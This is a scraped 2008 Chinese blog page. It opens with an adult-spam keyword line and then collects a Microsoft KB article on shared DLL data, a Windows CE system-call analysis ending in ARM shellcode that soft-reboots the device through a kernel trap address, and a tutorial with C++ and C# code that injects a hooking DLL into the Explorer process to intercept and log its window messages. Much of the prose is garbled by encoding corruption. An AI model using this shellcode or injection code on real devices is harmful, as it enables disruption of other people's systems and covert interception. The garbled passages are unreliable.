国产巨作麻豆欧美亚洲综合久久,国产激情久久久久影院老熟女,成人妇女免费播放久久久

如何�׃�n DLL 中的所有数�?微��Ysupport

井泉 — Tue, 28 Oct 2008 07:07:00 GMT

概要

Win 32 动态链接库 (DLL) 默认�Q�这意味着使用 DLL 的每个应用程序获取它自己�?DLL 的数据的副本的情况下使用实例数据�?但是�Q�就可以�׃�n DLL 数据之间所有��用该 DLL 的应用程序�?

如果您需要共享仅部分 DLL 数据�Q�Microsoft ��创徏一个新的节和而共享它�? 如果您想�׃�n的所�?DLL 静态数据，非常重要做两件事情：

• �W�一�ơ，DLL 必须使用 C �q�行时的 DLL 版本 �Q�例�?Crtdll.lib �?Msvcrt.lib�Q��?请参阅您的��品文��更多有关��?C �q�行�?DLL 中�?br>
注意�Q? Crtdll.lib 不再 SDK�Q�从 Windows NT 3.51 开始的一部分�?上次发布�q?4 �?1995 �q�上�?MSDN 3.5 SDK�?Win 32 现在要求用户指定的由他们自己的编译器 vender 提供�?C �q�行�?LIBs 他们自己的版本�?

•

�W�二个，您需要指�?data �?bss �׃�n�? 通常�Q�这�?def 文�g�?SECTIONS"部分中�?例如�Q?

   SECTIONS
      .bss  READ WRITE SHARED
      .data READ WRITE SHARED

如果您要使用 Visual C++ 32-bit Edition�Q�您必须指定此��用链接器上的部分开兟�?例如�Q?

link -section:.data,rws -section:.bss,rws

只有静态数据被�׃�n�?用对作�ؓ GlobalAlloc() �?malloc() �q�样�?API / 函数的调用动态分配的内存是仍然特定于调用�q�程�?

�pȝ��试图加蝲每个�q�程中相同的地址处共享的内存块�?但是�Q�如果块不能��加载到相同的内存地址�Q�系�l�将�׃�n的分区映��到一个不同的内存地址�?仍在�׃�n内存�?��h��意该�׃�n节内部指针无效在�q�种情况下�ƈ不能攑օ�享各节中�?

更多信息

C �q�行时��用全局变量�?如果 CRT 是静态与�?DLL�Q�链接这些变量将�?DLL 的所有客��L��之间�׃�n�q�将最有可能导致的异常 c 0000005�?

您要同时指定.data �?bss 为共享，因�ؓ它们每个保存不同�c�d��的数据�?.data 部分包含初始化的数据�Q?bss 部分保存未初始化的数据�?

for sharing in DLL all data one reason is to have in between Win32 DLL (running on Windows NT) and Win32s consistent behavior (running on Windows 3.1). when running on Win32s�Q?2-bit DLL shares among all of that use DLL processes its data�?

��h��意不需要共享所有数�?Win 32 �?Win32s 之间的行为完全相同�?DLL 可用于将变量存储为实例数据在 Win 32 �U�程本地存储 (TLS)�?br>
for additional information�Q�please see following article in Microsoft Knowledge Base:

109620 (http://support.microsoft.com/kb/109620/EN-US/) 在一�?Win 32 中创建实例数�?DLL

�q�篇文章中的信息适用�?

•

Microsoft Win32 Application Programming Interface 当用�?/td>

		Microsoft Windows NT 4.0
		Microsoft Windows NT 3.51 Service Pack 5
		Microsoft Windows NT 4.0
		Microsoft Windows 95
		Microsoft Windows 98 Standard Edition
		the operating system: Microsoft Windows 2000
		the operating system: Microsoft Windows XP

回到��端

关键字：	kbmt kbdll kbhowto kbipc kbkernbase KB109619 KbMtzh

井泉 2008-10-28 15:07 发表评论

井泉 — Thu, 14 Aug 2008 07:36:00 GMT

--[ 目录

  1 - Windows CE架构

  2 - 列出所有系�l�API

  3 - Windows CE的系�l�调�?br>
  4 - coredll.dll对API的包�?br>
  5 - 用系�l�调用实现shellcode

  6 - ��结

  7 - 感谢

  8 - 参考资�?br>

--[ 1 - Windows CE架构

�? 《Windows CE初探》一文中已经介绍了KDataStruct的结构，�q�是一个非帔R��要的数据�l�构�Q�可以从用户态的应用�E�序讉K��。其开始地址是固定的 PUserKData�Q�在SDK中定义：Windows CE Tools\wce420\POCKET PC 2003\Include\Armv4\kfuncs.h�Q�，对于ARM处理器是0xFFFFC800�Q�而其它处理器�?x00005800。偏�U? KINFO_OFFSET是UserKInfo数组�Q�里面保存了重要的系�l�数据，比如模块链表、内核堆、APIset pointers表（SystemAPISets�Q�。《Windows CE初探》一文中通过模块链表最�l�来搜烦API在coredll中的地址�Q�本文我们将讨论一下UserKInfo[KINX_APISETS]处的 APIset pointers表�?br>
Windows CE的API机制使用了PSLs(protected server libraries)�Q�是一�U�客��L��/服务端模式。PSLs象DLL一样处理导出服务，服务的导出通过注册APIset�?br>
�? 两种�c�d��的APIset�Q�分别是固有的和��Z��句柄的。固有的API sets注册在全局表SystemAPISets中，可以以API句柄索引和方法烦引的�l�合来调用他们的�Ҏ��。基于句柄的API和内核对象相养I��如文件�? 互斥体、事件等。这些API的方法可以用一个对象的句柄和方法烦引来调用�?br>
kfuncs.h中定义了固有APIset的句柄烦引，如：SH_WIN32、SH_GDI、SH_WMGR�{�。基于句柄的API索引定义在PUBLIC\COMMON\OAK\INC\psyscall.h 中，如：HT_EVENT、HT_APISET、HT_SOCKET�{��?br>
SystemAPISets共有32个CINFO�l�构的APIset�Q�通过遍历SystemAPISets成员�Q�可以列出系�l�所有API。其中CINFO的结构在PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h中定义：

/**
* Data structures and functions for handle manipulations
*/

typedef struct cinfo {
    char        acName[4];  /* 00: object type ID string */
    uchar       disp;       /* 04: type of dispatch */
    uchar       type;       /* 05: api handle type */
    ushort      cMethods;   /* 06: # of methods in dispatch table */
    const PFNVOID *ppfnMethods;/* 08: ptr to array of methods (in server address space) */
    const DWORD *pdwSig;    /* 0C: ptr to array of method signatures */
    PPROCESS    pServer;    /* 10: ptr to server process */
} CINFO;    /* cinfo */
typedef CINFO *PCINFO;

--[ 2 - 列出所有系�l�API

Dmitri Leman在他的cespy中有个DumpApis函数�Q�略加修改后如下�Q?br>
// DumpApis.cpp
//

#include "stdafx.h"

extern "C" DWORD __stdcall SetProcPermissions(DWORD);

#define KINFO_OFFSET     0x300
#define KINX_API_MASK    18
#define KINX_APISETS     24

#define UserKInfo  ((long *)(PUserKData+KINFO_OFFSET))

//pointer to struct Process declared in Kernel.h.
typedef void * PPROCESS;
//I will not bother redeclaring this large structure.
//I will only define offsets to 2 fields used in DumpApis():
#define PROCESS_NUM_OFFSET  0    //process number (index of the slot)
#define PROCESS_NAME_OFFSET 0x20 //pointer to the process name

//Also declare structure CINFO, which holds an information
//about an API (originally declared in
//PRIVATE\WINCEOS\COREOS\NK\INC\Kernel.h).
typedef struct cinfo {
    char        acName[4];  /* 00: object type ID string */
    uchar       disp;       /* 04: type of dispatch */
    uchar       type;       /* 05: api handle type */
    ushort      cMethods;   /* 06: # of methods in dispatch table */
    const PFNVOID *ppfnMethods;/* 08: ptr to array of methods (in server address space) */
    const DWORD *pdwSig;    /* 0C: ptr to array of method signatures */
    PPROCESS    pServer;    /* 10: ptr to server process */
} CINFO;    /* cinfo */

#define NUM_SYSTEM_SETS 32

/*-------------------------------------------------------------------
   FUNCTION: ProcessAddress
   PURPOSE:
   returns an address of memory slot for the given process index.
   PARAMETERS:
    BYTE p_byProcNum - process number (slot index) between 0 and 31
   RETURNS:
    Address of the memory slot.
-------------------------------------------------------------------*/
inline DWORD ProcessAddress(BYTE p_byProcNum)
{
    return 0x02000000 * (p_byProcNum+1);
}

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    FILE *fp;
    DWORD l_dwOldPermissions = 0;

    if ( (fp = fopen("\\apis.txt", "w")) == NULL )
    {
        return 1;
    }

    fprintf(fp, "Dump APIs:\n");

    __try
    {
        //Get access to memory slots of other processes
        l_dwOldPermissions = SetProcPermissions(-1);

        CINFO ** l_pSystemAPISets = (CINFO **)(UserKInfo[KINX_APISETS]);

        for(int i = 0; i < NUM_SYSTEM_SETS; i++)
        {
            CINFO * l_pSet = l_pSystemAPISets[i];
            if(!l_pSet)
            {
                continue;
            }
            LPBYTE l_pServer = (LPBYTE)l_pSet->pServer;
            fprintf(fp,
                "APIset: %02X   acName: %.4s   disp: %d   type: %d   cMethods: %d   "
                "ppfnMethods: %08X   pdwSig: %08X   pServer: %08X %ls\n",
                i,
                l_pSet->acName,
                l_pSet->disp,
                l_pSet->type,
                l_pSet->cMethods,
                l_pSet->ppfnMethods,
                l_pSet->pdwSig,
                l_pServer,
                l_pServer? (*(LPTSTR*)
                    (l_pServer + PROCESS_NAME_OFFSET)) : _T("") );

            //If this API is served by an application - get it''s
            //address, if it is served by the kernel - use address 0
            DWORD l_dwBaseAddress = 0;
            if(l_pServer)
            {
                l_dwBaseAddress = ProcessAddress
                    (*(l_pServer + PROCESS_NUM_OFFSET));
            }

            //Add the base address to the method and signature
            //tables pointers
            PFNVOID * l_ppMethods = (PFNVOID *)l_pSet->ppfnMethods;
            if(l_ppMethods  && (DWORD)l_ppMethods < 0x2000000)
            {
                l_ppMethods = (PFNVOID *)
                    ((DWORD)l_ppMethods + l_dwBaseAddress);
            }

            DWORD * l_pdwMethodSignatures = (DWORD *)l_pSet->pdwSig;
            if(l_pdwMethodSignatures &&
                (DWORD)l_pdwMethodSignatures < 0x2000000)
            {
                l_pdwMethodSignatures = (DWORD *)
                    ((DWORD)l_pdwMethodSignatures + l_dwBaseAddress);
            }

            if(l_ppMethods)
            {
                for(int j = 0; j < l_pSet->cMethods; j++)
                {
                    PFNVOID l_pMethod = l_ppMethods?
                        l_ppMethods[j] : 0;
                    if(l_pMethod && (DWORD)l_pMethod < 0x2000000)
                    {
                        l_pMethod = (PFNVOID)
                            ((DWORD)l_pMethod + l_dwBaseAddress);
                    }
                    DWORD l_dwSign = l_pdwMethodSignatures?
                        l_pdwMethodSignatures[j] : 0;
                    fprintf(fp,
                        "  meth #%3i: %08X sign %08X\n",
                        j,
                        l_pMethod,
                        l_dwSign);
                }
            }
        }//for(int i = 0; i < NUM_SYSTEM_SETS; i++)
    }
    __except(1)
    {
        fprintf(fp, "Exception in DumpApis\n");
    }

    if(l_dwOldPermissions)
    {
        SetProcPermissions(l_dwOldPermissions);
    }
    fclose(fp);

    return 0;
}

来看一下此�E�序输出的片断：

APIset: 00   acName: Wn32   disp: 3   type: 0   cMethods: 185   ppfnMethods: 8004B138   pdwSig: 00000000   pServer: 00000000
  meth #  0: 8006C83C sign 00000000
  meth #  1: 8006C844 sign 00000000
  meth #  2: 800804C4 sign 00000000
  meth #  3: 8006BF20 sign 00000000
  meth #  4: 8006BF94 sign 00000000
  meth #  5: 8006BFEC sign 00000000
  meth #  6: 8006C0A0 sign 00000000
  meth #  7: 8008383C sign 00000000
  meth #  8: 80068FC8 sign 00000000
  meth #  9: 800694B0 sign 00000000
  meth # 10: 8006968C sign 00000000
...

�q? 是最开始的一个APIset�Q�它的ppfnMethods�?x8004B138�Q�cMethods�?85�Q�根据这两个数据得到185个地址�Q�这些地址实际上就是内核系�l�调用的实现地址。它们的索引相对PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h里的 Win32Methods数组�Q?br>
const PFNVOID Win32Methods[] = {
    (PFNVOID)SC_Nop,
    (PFNVOID)SC_NotSupported,
    (PFNVOID)SC_CreateAPISet,               //  2
    (PFNVOID)EXT_VirtualAlloc,              //  3
    (PFNVOID)EXT_VirtualFree,               //  4
    (PFNVOID)EXT_VirtualProtect,            //  5
    (PFNVOID)EXT_VirtualQuery,              //  6
    (PFNVOID)SC_VirtualCopy,                //  7
    (PFNVOID)SC_LoadLibraryW,               //  8
    (PFNVOID)SC_FreeLibrary,                //  9
    (PFNVOID)SC_GetProcAddressW,            // 10
...
    (PFNVOID)SC_InterruptMask,              // 184
};

--[ 3 - Windows CE的系�l�调�?br>
Windows CE没有使用ARM处理器的SWI指��o来实现系�l�调用，SWI指��o在Windows CE里是�I�的�Q�就��单的执行�?movs pc,lr"�Q�详见armtrap.s关于SWIHandler的实玎ͼ�。Windows CE的系�l�调用��用了0xf0000000 - 0xf0010000的地址�Q�当�pȝ��执行�q�些地址的时候将会触发异常，产生一个PrefetchAbort的trap。在PrefetchAbort的实现里�Q�详见armtrap.s�Q�首先会��查异常地址是否在系�l�调用trap区，如果不是�Q�那么执行ProcessPrefAbort�Q�否则执�? ObjectCall查找API地址来分�z��?br>
通过APIset和其API的烦引可以算出系�l�调用地址�Q�其公式是：0xf0010000-(256*apiset+apinr)*4。比如对于SC_CreateAPISet的系�l�调用可以这��L��? 来：0xf0010000-(256*0+2)*4=0xF000FFF8�?br>

--[ 4 - coredll.dll对API的包�?br>
选择一个没有参数的SetCleanRebootFlag()�q�行分析�Q�IDAPro对其的反汇编如下�Q?br>
.text:01F74F70                 EXPORT SetCleanRebootFlag
.text:01F74F70 SetCleanRebootFlag
.text:01F74F70                 STMFD   SP!, {R4,R5,LR}
.text:01F74F74                 LDR     R5, =0xFFFFC800
.text:01F74F78                 LDR     R4, =unk_1FC6760
.text:01F74F7C                 LDR     R0, [R5]        ; (2FF00-0x14) -> 1
.text:01F74F80                 LDR     R1, [R0,#-0x14]
.text:01F74F84                 TST     R1, #1
.text:01F74F88                 LDRNE   R0, [R4]        ; 8004B138 ppfnMethods
.text:01F74F8C                 CMPNE   R0, #0
.text:01F74F90                 LDRNE   R1, [R0,#0x134]
.text:01F74F94                 LDREQ   R1, =0xF000FECC
.text:01F74F98                 MOV     LR, PC
.text:01F74F9C                 MOV     PC, R1          ; 80062AAC SC_SetCleanRebootFlag
.text:01F74FA0                 LDR     R3, [R5]
.text:01F74FA4                 LDR     R0, [R3,#-0x14]
.text:01F74FA8                 TST     R0, #1
.text:01F74FAC                 LDRNE   R0, [R4]        ; 8004B138 ppfnMethods
.text:01F74FB0                 CMPNE   R0, #0
.text:01F74FB4                 LDRNE   R0, [R0,#0x25C]
.text:01F74FB8                 MOVNE   LR, PC          ; 800810EC SC_KillThreadIfNeeded
.text:01F74FBC                 MOVNE   PC, R0
.text:01F74FC0                 LDMFD   SP!, {R4,R5,PC}
.text:01F74FC0 ; End of function SetCleanRebootFlag

写一个包含SetCleanRebootFlag()函数的小�E�序用EVC�q�行跟踪调试�Q�按F11�q�入该函��C��后，�E�序首先取KDataStruct的lpvTls成员�Q�然后取lpvTls偏移-0x14的内容，��试该内�Ҏ��否是1�?br>
得先来了解一下lpvTls偏移-0x14的数据是什么。先看PUBLIC\COMMON\OAK\INC\pkfuncs.h里的几个定义�Q?br>
#define CURTLSPTR_OFFSET 0x000
#define UTlsPtr() (*(LPDWORD *)(PUserKData+CURTLSPTR_OFFSET))
#define PRETLS_THRDINFO         -5   // current thread''s information (bit fields, only bit 0 used for now)

#define UTLS_INKMODE            0x00000001  // bit 1 set if in kmode

看来lpvTls偏移-0x14保存的是当前�U�程信息�Q�只有第0比特被��用。再来看PRIVATE\WINCEOS\COREOS\NK\KERNEL\ARM\mdram.c里的MDCreateMainThread2函数�Q?br>
...
    if (kmode || bAllKMode) {
        pTh->ctx.Psr = KERNEL_MODE;
        KTHRDINFO (pTh) |= UTLS_INKMODE;
    } else {
        pTh->ctx.Psr = USER_MODE;
        KTHRDINFO (pTh) &= ~UTLS_INKMODE;
    }
...

KTHRDINFO (pTh)在PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h里定义：

#define KTHRDINFO(pth)        ((pth)->tlsPtr[PRETLS_THRDINFO])

它就是lpvTls偏移-0x14。也��是说系�l�在创徏�ȝ��E�的时候，�Ҏ��E�序当前的模式来讄��KTHRDINFO的��|��如果是内核模式，那么�?�Q�否则是0�?br>
�? 到coredll.dll中SetCleanRebootFlag的实玎ͼ��q�时可以知道判断lpvTls偏移-0x14的内�Ҏ��Z��查当前是否内核模式。由于Pocket PC ROM�~�译时��用了Enable Full Kernel Mode选项�Q�所以程序都是以内核模式�q�行。于是接着调试时可以看到取0x1FC6760的内容，取出来后�Q�R0的值时0x8004B138�Q�这个值正�? 是DumpApis�E�序输出的第一个APIset的ppfnMethods。接下来执行�Q?br>
.text:01F74F90                 LDRNE   R1, [R0,#0x134]
.text:01F74F94                 LDREQ   R1, =0xF000FECC

�? 于程序是内核模式�Q�所以前一条指令成功取出��|��后一条无效。这时R1的值是0x80062AAC�Q�和DumpApis�E�序输出的一个地址匚w��Q�根据烦引，发现�q�个地址是SC_SetCleanRebootFlag在内�怸�的实现。其实烦引也可以�Ҏ��q�条指��o的偏�U�L��取：0x134/4=0x4D(77)�Q? �Ҏ��kwin32.h里Win32Methods的烦引直接就对应出SC_SetCleanRebootFlag。内核模式的话，后面�q�会执行 SC_KillThreadIfNeeded�?br>
如果是用��h��式的话，�pȝ��会执�?xF000FECC�q�个地址�Q�这昄��是一个系�l�调�? trap地址。根据上面的公式��出索引��|��(0xf0010000-0xF000FECC)/4=0x4D(77)�Q�根据kwin32.h�? Win32Methods的烦引也对应��是SC_SetCleanRebootFlag�?br>
通过分析coredll.dll对API包裹的实玎ͼ�可以发现Windows CE在调用一部分API的时候会先判断程序是否处于内核模式，如果是，那么不用�pȝ��调用方式�Q�直接奔内核实现地址��M��Q�否则就老老实实的用系�l�调用地址�?br>

--[ 5 - 用系�l�调用实现shellcode

�p? �l�调用地址相对固定�Q�可以通过索引��出它的trap地址�Q�而且搜烦coredll.dll里API地址的方法在用户态是无法实现的，因�ؓ模块链表是在内核 �I�间�Q�用��h��无法访问。下面就是用�pȝ��调用实现的简单shellcode�Q�它的作用是软重启系�l�，我想对于smartphone的系�l�应该也是可�? �Q�smartphone的ROM在编译时没有用Enable Full Kernel Mode选项�Q��?br>
#include "stdafx.h"

int shellcode[] =
{
0xE59F0014, // ldr r0, [pc, #20]
0xE59F4014, // ldr r4, [pc, #20]
0xE3A01000, // mov r1, #0
0xE3A02000, // mov r2, #0
0xE3A03000, // mov r3, #0
0xE1A0E00F, // mov lr, pc
0xE1A0F004, // mov pc, r4
0x0101003C, // IOCTL_HAL_REBOOT
0xF000FE74, // trap address of KernelIoControl
};

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    ((void (*)(void)) & shellcode)();

    return 0;
}

--[ 6 - ��结

通过本文可以了解到Windows CE API机制的大概轮廓，对于�pȝ��调用的具体流�E�，也就是trap后的具体��程�q�不是很清晰�Q�本文也��׃��块破砖头�Q�希望能砸到几个人，可以一赯��论；�Q?br>文中如有错误�q�望不吝赐教�Q�希望Xcon''05见�?br>

--[ 7 - 感谢

非常感谢Nasiry�Ҏ��的帮助，在他的帮助下才得以完成此文�?img src ="http://www.shnenglu.com/zjj2816/aggbug/58841.html" width = "1" height = "1" />

井泉 2008-08-14 15:36 发表评论

井泉 — Thu, 14 Aug 2008 01:29:00 GMT

�q�日�Q�由于程序设计需要，我对WincowsCE �?a target="_blank" class="channel_keylink">内存布局�q�行了研�IӞ��׃��发现国内在这斚w��的文档资料较��，于是在研�I�告一�D�落之际�Q��Ş成这��示例文��，以望抛砖引玉�Q�得到别的高手的指正�?br>
　　一、程序实现的先决条�g

　　�׃��windows�pȝ��的窗体消息��L��投递至一个特定进�E�的指定�H�体消息函数中。于是在本地�q�程�Q�自��q��应用�E�序�Q�中取得属于其它�q�程的窗体的消息必须实现以下两个部分�Q?br>
　　1、将需要挂接窗体的代码攑ֈ�目标�q�程的地址�I�间中去�?br>
　　2、执行这一�D�代码，�q�获得目标进�E�窗体的消息�?br>
　　�q�两步看��h��很简单，但在实现�q�程中就比较困难。由于Windows CE作�ؓ嵌入式移动设�?a target="_blank" class="channel_keylink">操作�pȝ��Q�与windows 98/2000/XP�{�桌�?a target="_blank" class="channel_keylink">操作�pȝ��? 内核的设计理念以及API的支持上有极大的区别。这��q��接导致了常规的桌面系�l�利用全局鼠标钩子注入/�q�程�U�程注入�{�方法在CE中完全得不通。不�q�可喜的是，微��Y在开发工具中提供的remotexxx�{�远�E�调试程序��我清楚这个目标�ƈ不是不可能的��d��Q�微软既然可以做刎ͼ�那就是说在CE的内部一定有一套完整的跨进�E?a target="_blank" class="channel_keylink">内存讉K��/代码注入的机制�?br>
　　二、程序实现的基本原理

�l�过两天的google 搜烦�Q�在�|�上我发��C��一个没有在微��Y文��中声明的有趣的API函数�Q�PerformCallBack4�Q�传说中�q�个函数可以在自��q��应用�E�序中执行指定的 �q�程中的一个函敎ͼ�So Cool!�q�好象正是我所需要的东西。虽然网上也传闻�q�个函数在wm5不受支持�Q�其实经�q�实践这个传��d��是谣传而已�Q?br>
　　PerformCallBack4函数的定义：

[DllImport("coredll.dll")]
public static extern uint PerformCallBack4(ref CallBackInfo CallBackInfo,
IntPtr ni_pVoid1,IntPtr ni_pVoid2,IntPtr ni_pVoid3);

　　其中函数的参数CallBackInfo�l�构定义:

[StructLayout(LayoutKind.Sequential)]
public struct CallBackInfo
{
public IntPtr hProc; //�q�程的目标进�E?br>public IntPtr pfn; //指向�q�程目标�q�程的函数地址的指�?br>public IntPtr pvArg0; //函数的需要的�W�一个参�?br>}//end struct

　　而PerformCallback4�?ni_pVoid1、ni_pVoid2、ni_pVoid3��Z��递到�q�程目标�q�程执行函数的其它三个参数�?br>
　　至于��代码放到目标进�E�的内存�I�间�Q�我们可以利用CE设计上的一个特性：

　　1、�ؓ了节�U?a target="_blank" class="channel_keylink">内存使用�Q�CE��所有程序调用的动态链接库�Q�DLL�Q�都映射到同一�?a target="_blank" class="channel_keylink">内存地址中�?br>
　　2、CE�?a target="_blank" class="channel_keylink">内存布局中划分有一个slot0�?a target="_blank" class="channel_keylink">内存位置�Q�这�?a target="_blank" class="channel_keylink">内存位置是由正在执行的进�E�所占有的，每一个特定的旉��片，只能有一个进�E�可以占有这�?a target="_blank" class="channel_keylink">内存�I? 间。在�q�程要求执行�Ӟ��pȝ��q�不直接执行�q�程所处内存位�|�的代码�Q�而是��该�q�程的执行代码复制到slot0的内存位�|�中产生一个副本执行。也��是说进�E�在执行时内存将会有�q�程执行代码的两个完全一��L��版本�Q�存在于slot0中正在执行的�q�程代码和进�E�本�w�所处的内存中的代码�?br>
　　在这个特性下�Q�可以得到结论：如果�q�程A通过LoadLibrary函数装蝲Test.dll�Q�而进�E�B也通过LoadLibrary函数装蝲同一�? Test.dll�Q�这个Test.dll的所有函数在�q�程A和进�E�B中执行时�Q�相对于slot0中的�q�程执行代码都会得到同一地址�?br>
3、在CE中，�pȝ��在内存中划分�?3个slot�Q�slot0保留�l�正在执行的�q�程�Q�然后在�q�程启动时将所有的代码攑ֈ�除slot0以外的一个slot�? �Q�这��是臭名昭著的CE�pȝ��中内存最多只能有不多�?2个程序执行的限制的来由）。在�q�程执行�Ӟ��每个应用�E�序的内存访问默认只能访问slot0内存�I�间中的地址以及�q�程所处的slot内存�I�间的地址�? 但�ؓ使设备驱动程序可以访问到它们所需的其它应用程序数据，CE提供了两个函��C��打破�q�个限制�Q�SetKmode�? SetProcPermission�Q�SetKmode函数告诉�pȝ��Q�当前运行的�q�程是否需要在内核模式中执行；SetProcPermission函数可以接受一个位掩码�Q�每一位代码一个slot的访问控�Ӟ��1代表可以讉K��该slot的内存内宏V�?表示不能讉K��该slot的内存内宏V��这两个函数�? msdn中有帮助文��Q�可参阅msdn的文档说明�?br>
　　本文我们对实现的原理�q�行了剖析，在下一��文章中我们��以一个小�C�Z��E�序演示实现的全�q�程�?

在文章《浅析Windows CE跨进�E�内存注入实现窗体消息挂接（上）》中�Q�我们已�l�得��C��q�个七��y板游戏所需要的所有小板块�Q�剩下的事就是等待我们按一定顺序将合适的板块攑ֈ�合适的位置�Q�本章我们开始进行真刀真枪的实战演�l��?/p>

�E�序目标�Q�捕获explore�H�体�Q�也��是�E�序�H�体的消息�ƈ输出到WinProcInfo.txt中）

�E�序的执行步骤设计如下：

1、编写一个窗体消息挂接DLL�Q�这个DLL提供一个，函数中利用setwindowlong函数��窗体的默认消息处理�q�程改�ؓ�q�个挂接DLL中定义的一个窗体过�E��?/p>

2、在C#�E�序中利用findwindow�{�API函数获得exlore�cȝ��体的句柄及窗体所属的�q�程�Q��ƈ使用performcallback4在目标进�E�空间中执行coredll.dll的loadLibrary函数��我们写的挂接dll攑ֈ�目标�q�程中�?/p>

3、在C#�E�序中��用performcallback4在目标进�E�空间中执行挂接DLL提供的导出接口函数实现跨�q�程�H�体消息截获.

一、程序的实现如下�Q?/strong>

在VS2005中徏立一个智能设备的MFC DLL�Q�命名�ؓHookWindowsProcMFCDLL�?/p>
在HookWindowsProcMFCDLL.cpp中进行挂接DLL的核心编码：

LRESULT CALLBACK fnHookWindowProc(HWND hwnd,UINT msg,WPARAM wparam, LPARAM lparam);

int __declspec(dllexport) WINAPI fnAttachWinProc(HWND ni_hAttatchWin,PVOID ,PVOID,PVOID);

int __declspec(dllexport) WINAPI fnDetachWinMsgProc(HWND ni_hDetachWin);

WNDPROC tpOldWindowProc;

FILE *m_pDebugOutputFile;

//��一个窗体消息处理挂接到net�_��版MessageWindow对象上的代码
typedef struct
{
　WNDPROC OldWinProc;//保留�H�体原始消息处理�q�程的函数指�?br>　HWND WindowHandle;//保存net�_��版中对应的窗口挂接的MessageWindow对象的句�?br>} DEFUDT_AttachWinInfo; //end struct

CMap m_aAttachWinInfoMap;

//�Ҏ��定的�H�口�q�程�q�行挂接
int __declspec(dllexport) WINAPI fnAttachWinProc(HWND ni_hAttatchWin,
PVOID ni_0,
PVOID ni_1,
PVOID ni_2 )
{
　DEFUDT_AttachWinInfo tudtAttachWinInfo;
　m_pDebugOutputFile = fopen("\\Storage Card\\WinProcInfo.txt", "w");
　WNDPROC tpOldWindowProc=(WNDPROC)::SetWindowLong(ni_hAttatchWin, GWL_WNDPROC,(LONG) fnHookWindowProc );
　fprintf(m_pDebugOutputFile,"Attatch successfully! OldWindowProc: %08X\n",tpOldWindowProc);
　tudtAttachWinInfo.OldWinProc=tpOldWindowProc ;
　tudtAttachWinInfo.WindowHandle=ni_hAttatchWin;
　m_aAttachWinInfoMap.SetAt(ni_hAttatchWin,tudtAttachWinInfo);
　fclose(m_pDebugOutputFile);
　return 77;// (int)tpOldWindowProc ;
}//end function

int __declspec(dllexport) WINAPI fnDetachWinMsgProc(HWND ni_hDetachWin)
{
　DEFUDT_AttachWinInfo tudtAttachWinInfo;
　WNDPROC tpOldWindowProc;

　//取得在ncf中消息接收窗口对应的原始消息处理函数的函数指�?br>　m_aAttachWinInfoMap.Lookup(ni_hDetachWin,tudtAttachWinInfo) ;

　//��窗体的消息处理函数设�ؓ默认的处理过�E?br>　tpOldWindowProc =(WNDPROC) SetWindowLong(ni_hDetachWin,GWL_WNDPROC , (LONG)tudtAttachWinInfo.OldWinProc);

　//��挂接信息消息处理映谢类中删�?br>　m_aAttachWinInfoMap.RemoveKey(ni_hDetachWin);

　return (int)tpOldWindowProc ;

}//end function

LRESULT CALLBACK fnHookWindowProc(HWND hwnd,UINT msg,WPARAM wparam, LPARAM lparam)
{
　DEFUDT_AttachWinInfo tudtAttachWinInfo;
　m_aAttachWinInfoMap.Lookup(hwnd,tudtAttachWinInfo) ;
　m_pDebugOutputFile = fopen("\\Storage Card\\WinProcInfo.txt", "a");
　if (m_pDebugOutputFile!=NULL)
　{
　　fprintf(m_pDebugOutputFile,"HWND: %08X Msg: %08X Wparam %08X Lparam %08X \n",
hwnd,msg,wparam,lparam);

　}//EHD IF

　fclose(m_pDebugOutputFile);
　//tudtAttachWin=maatt
　LRESULT tobjResult= ::CallWindowProc(tudtAttachWinInfo.OldWinProc ,hwnd,msg,wparam,lparam);
　return tobjResult;
}//end function

而在C#的主�E�序中，我们使用�q�个DLL挂接explore�cȝ��E�序�H�体�Q�以下给出挂接部分的代码�Q?/p>

int m_hTargetWindow;//要挂接的目标�H�体句柄
IntPtr m_hTargetProcess;//目标�H�体所属的�q�程
IntPtr m_hModule; //挂接DLL的句�?/p>
private void Form1_Load(object sender, EventArgs e)
{
　IntPtr tpTemp = IntPtr.Zero, tpTempa = IntPtr.Zero;
　uint tuntApiRet;

　m_hTargetWindow = (int)clsCECoreAPI.FindWindow("Explore", null );//资源��理�?0x0013e800;

　//挂接指定的进�E�窗体消�?br>　IntPtr thCurrentProcess = clsCECoreAPI.GetCurrentProcess();
　m_hTargetProcess=IntPtr.Zero ;// (IntPtr) (unchecked((int)0xedd84e4a));
　tuntApiRet= clsCECoreAPI.GetWindowThreadProcessId(new IntPtr(unchecked((int) m_hTargetWindow)),
ref m_hTargetProcess);

　string tstrArgument;
　tstrArgument = "\\Program Files\\processinject\\HookWindowsProcMFCDLL.dll";// HookWindowsProcMFCDLL.dll";
　IntPtr tpArg0;

　int tintOriginalKMode = clsCECoreAPI.SetKMode(1);
　int tintOriginalProcPermission = (int)clsCECoreAPI.SetProcPermissions(0xffffffff);

　IntPtr tpFuncProc = clsCECoreAPI.GetProcAddress(clsCECoreAPI.GetModuleHandle("coredll.dll"), "LoadLibraryW");

　CallBackInfo tudtCALLBACKINFO;

　tpArg0 = clsCECoreAPI.MapPtrToProcess(tstrArgument, thCurrentProcess);

　tudtCALLBACKINFO.hProc = m_hTargetProcess;// Proc;
　tudtCALLBACKINFO.pfn = clsCECoreAPI.MapPtrToProcess(tpFuncProc, m_hTargetProcess);
　tudtCALLBACKINFO.pvArg0 = tpArg0;
　m_hModule =new IntPtr(unchecked(
(int) clsCECoreAPI.PerformCallBack4(ref tudtCALLBACKINFO,IntPtr.Zero,IntPtr.Zero,IntPtr.Zero )));
　//clsCECoreAPI.Sleep(1000);

　IntPtr thModule = clsCECoreAPI.LoadLibrary("HookWindowsProcMFCDLL.dll");
　tpFuncProc = clsCECoreAPI.GetProcAddress(thModule, "fnAttachWinProc");

　tpArg0 = (IntPtr) m_hTargetWindow;// clsCECoreAPI.MapPtrToProcess(ref thTargetWindow, thCurrentProcess);

　tudtCALLBACKINFO.hProc = m_hTargetProcess;
　tudtCALLBACKINFO.pfn = clsCECoreAPI.MapPtrToProcess(tpFuncProc, m_hTargetProcess);
　tudtCALLBACKINFO.pvArg0 = tpArg0 ;
